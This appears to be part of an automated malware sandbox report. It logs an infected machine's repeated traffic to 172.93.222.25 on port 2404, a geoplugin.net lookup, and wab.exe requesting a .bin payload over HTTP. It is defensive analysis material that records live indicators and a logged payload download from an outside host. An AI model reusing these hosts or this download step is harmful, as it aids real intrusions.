                                                Jul 15, 2024 09:25:35.862267971 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:35.862281084 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:35.862379074 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:35.862500906 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:35.863362074 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:35.863471985 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:35.888219118 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.083266973 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.122634888 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.138057947 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.158267975 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.158303022 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.158376932 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.158530951 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.160490036 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.160659075 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.161189079 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.161361933 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.161523104 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.352849007 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.352943897 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.352955103 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.353059053 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.354907036 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.354918003 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.355138063 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.355289936 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.355434895 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.355562925 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.356220961 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.356923103 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.555610895 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.597219944 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.606725931 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.629092932 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.629162073 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.629175901 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.629381895 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.634912968 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.635068893 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.637092113 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.637268066 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.637448072 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.810086012 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:36.823502064 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.823618889 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.823760986 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.823776960 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.829272985 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.829524040 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.829833984 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.831296921 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:36.831756115 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.005115032 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.050043106 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.059695005 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.069442034 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.069550991 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.069720984 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.069889069 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.071635962 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.071727991 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.071799040 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.072410107 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.072567940 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.247415066 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.263818979 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.263997078 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.264072895 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.264403105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266168118 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266280890 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266293049 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266402960 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266413927 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266752005 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.266875982 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.443226099 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.484791040 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.497148037 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.506223917 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.506263971 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.506337881 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.506485939 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.506655931 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.508330107 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.508424997 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.508522987 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.509066105 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.509145975 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.669219017 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:37.701060057 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.701071978 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.701158047 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.702739954 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.702750921 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:37.703013897 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.018501043 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.022273064 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.041263103 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.043353081 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.074203014 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.086685896 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.086709023 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.086787939 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.086955070 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.088764906 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.088928938 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.089415073 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.089555025 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.089715004 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.268312931 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.281300068 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.281311989 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.281394958 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.281404018 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283643961 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283654928 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283755064 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283766031 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283773899 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283782959 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.283792019 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.284420013 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.284549952 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.284559965 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.308504105 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.346621037 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.346796989 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.362184048 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.362205982 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.362286091 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.362448931 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.362618923 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.364010096 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.364109039 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.364207983 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.364670992 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.364773989 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.541671038 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.556699038 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.556710005 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.556760073 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.556770086 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.557768106 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.557868004 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558402061 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558410883 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558422089 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558533907 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558660030 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558789015 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558798075 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.558881998 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.559194088 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.589673996 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.622034073 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.622137070 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.622158051 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.624291897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.624465942 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.625263929 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.625430107 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.643589020 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.643804073 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.816378117 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.816391945 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.816584110 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.816710949 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.818547010 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.818742037 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.818861961 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.818990946 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.819000959 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.819088936 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.819385052 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.819591999 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.838666916 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.886481047 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.916167021 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.916188002 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.916240931 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.916444063 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.916608095 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.918548107 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.918653011 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.918752909 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.919302940 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.919334888 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:42.955962896 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:42.956130028 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.111459970 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.111514091 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.111525059 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.111536026 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.112982988 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.113380909 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.114192963 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.151141882 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.198951006 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.206578970 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.206603050 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.206687927 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.206847906 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.208503008 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.208578110 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.208669901 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.209084034 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.209237099 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.209361076 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.346877098 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.347137928 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.402893066 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.402977943 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403042078 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403101921 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403158903 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403217077 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403753996 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403821945 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403879881 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.403948069 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.543426037 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.589512110 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.606103897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.606189966 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608020067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608202934 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608613968 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608786106 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.608944893 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.659405947 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.659559011 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.783925056 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.800839901 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.800851107 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.800929070 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801054955 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801064968 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801573992 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801717997 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.801727057 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802637100 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802647114 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802872896 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.802881956 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803366899 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803452015 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803462029 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803505898 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803517103 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.803527117 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.804508924 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.804519892 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.839437962 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841579914 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841602087 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841680050 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.841846943 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.842017889 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.843703032 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.843789101 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.843875885 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.844427109 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.844527960 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:43.955864906 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:43.956079006 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.033688068 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037554979 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037564039 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037662029 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037669897 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037681103 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.037691116 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038134098 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038144112 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038244963 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038497925 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038634062 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038753033 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.038763046 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.073760986 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.090944052 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.090960979 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.091042042 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.091204882 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.091381073 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093087912 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093189001 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093272924 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093751907 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.093849897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.149574995 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.268138885 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285701990 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285713911 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285792112 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285799980 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.285808086 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287542105 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287657976 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287667990 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.287904978 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.288256884 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.288407087 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.322586060 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.322676897 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.322766066 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.324393034 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.324553967 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.325022936 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.325190067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.346664906 CEST240449865172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.346889019 CEST498652404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.414719105 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.414839983 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.416769028 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.416939974 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.417577028 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.417746067 CEST498662404192.168.11.30172.93.222.25
                                                Jul 15, 2024 09:25:44.517731905 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517745972 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517755985 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517832041 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517842054 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.517853975 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.518690109 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.518800020 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519321918 CEST240449866172.93.222.25192.168.11.30
                                                Jul 15, 2024 09:25:44.519448042 CEST240449866172.93.222.25192.168.11.30
                                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                Jul 15, 2024 09:23:59.285379887 CEST | 192.168.11.30 | 1.1.1.1 | 0x8437 | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
                                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                Jul 15, 2024 09:23:59.449024916 CEST | 1.1.1.1 | 192.168.11.30 | 0x8437 | No error (0) | geoplugin.net |  | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                0 | 192.168.11.30 | 49859 | 209.90.237.48 | 80 | 8740 | C:\Program Files (x86)\Windows Mail\wab.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jul 15, 2024 09:23:55.648178101 CEST | 176 | OUT | GET /HMKcAbwpOCo117.bin HTTP/1.1
